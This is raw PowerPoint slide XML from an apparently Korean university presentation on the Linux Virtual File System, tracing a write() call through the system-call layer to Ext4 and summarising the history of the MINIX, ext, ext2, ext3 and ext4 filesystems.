            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901CEC74-A516-49F2-9585-853878CC1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732" y="1914168"/>
            <a:ext cx="4127654" cy="23218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고려대 사이버국방학과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5832F971-281D-46BC-A901-B98A0CAEE0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718" y="1669010"/>
            <a:ext cx="4781550" cy="325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15599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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="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순서</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28AAD373-7753-4C96-B8AC-6E8251D91388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496172" y="5513576"/>
            <a:ext cx="9826276"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VFS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>파일시스템 관련 인터페이스를 사용자 공간 어플리케이션에 제공하는 커널 서브시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>여러 종류의 파일 시스템을 서로 호환해야 하기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>가 필요함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>VLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>는 다양한 파일시스템들이 공존할 수 있도록 공통된 인터페이스를 제공</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50CAAA6-B1B6-4348-A091-D9D6A83E0824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7473409" y="2230868"/>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664" y="2673428"/>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960915" y="2366226"/>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7823330" y="3018733"/>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5946407" y="2381263"/>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5946406" y="2987488"/>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1878827" y="2497031"/>
            <a:ext cx="783470"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6921965" y="3052891"/>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2662297" y="2381262"/>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2662297" y="2686789"/>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50" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637856" y="2752192"/>
            <a:ext cx="603081" cy="2011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531B8CC0-5AD2-4D88-9129-603576A5BAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240937" y="2381262"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="직사각형 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D097177-8885-4C9A-92CE-0CC224A0A39E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240937" y="2887928"/>
            <a:ext cx="975559" cy="130805"/>
          </a:xfrm>
          <a:prstGeom prst="rec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54A7A739-F8BA-4663-ABD3-D6F129DB0921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216496" y="2953331"/>
            <a:ext cx="729910" cy="99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908473" y="2281925"/>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8" name="TextBox 2067">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C5E139-2562-4FBF-9E93-615B3EDE21C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200570" y="4120066"/>
            <a:ext cx="659366" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Ext 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290309C0-CF9C-47FB-BD0B-61DE8CBE524D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1108554">
            <a:off x="3609712" y="2522971"/>
            <a:ext cx="659366" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SystemCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26F3793-A531-4CE8-8CA3-6758CCB93D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090188" y="2028937"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D7DA94-C666-40F1-95E8-7743F9C7837B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1187440">
            <a:off x="1954836" y="2162769"/>
            <a:ext cx="763836" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>Write </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>/test/myfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“Helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>!”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFEF841B-A835-4033-8B23-3B4C0C6384CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="520473">
            <a:off x="5230864" y="2764817"/>
            <a:ext cx="734008" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4B194B-7581-4447-857D-94F3A81FC9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="355509">
            <a:off x="6882339" y="2712093"/>
            <a:ext cx="734008" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Excute!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="화살표: 오른쪽 25">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66656E67-162D-4ADE-87C1-02D4B859BC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08856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/T3/History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역사</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E72FE4A-7563-4A5F-AA8C-9E02FBA9393C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977984" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="2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MFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>MINIX File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM PC/AT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>마이크로 컴퓨터 목표</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1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년대 유행</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파일이름은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>문자만 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64MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 저장공간만의 사용이 가능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C560B09C-E352-4454-96EC-01F68500A213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789267" y="4299286"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00502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파일당 오직 한개의 타임스탬프</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널에 새로운 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</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파일이름으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>자를 사용가능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최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 저장 공간</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504D4B5F-0610-4DA4-890E-5D69618EE41D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600550" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007A37"/>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2</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2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gigabyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이상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파일시스템 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>크기는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>terabyte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이상</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용가능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정전 시 심각한 손상</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EE5582-E6C9-4A23-8202-F8BBFF7DF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517532" y="4299286"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00964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3</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3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Journaling (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일복구 기능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>데이터 안전하게 보호</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16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비트 내부 주소</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파일크기 최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2TB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C574AEDC-8E05-45CC-8598-C0842B76BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8223116" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>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4</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4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대용량 파일 시스템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단편화 문제 대한 성능 증가</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타임 스탬프를 개선</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메모리 할당 속도 증가</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39952127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5A063FD4-1F54-40FE-A3C3-A59EFABA0BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4965791" y="2109127"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="직사각형 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AE00E6-AD69-4DAE-87CD-46062ADE7F42}"/>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8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8C1FDB-A0C7-4698-9605-5CC477623B5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12" name="사각형: 둥근 모서리 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
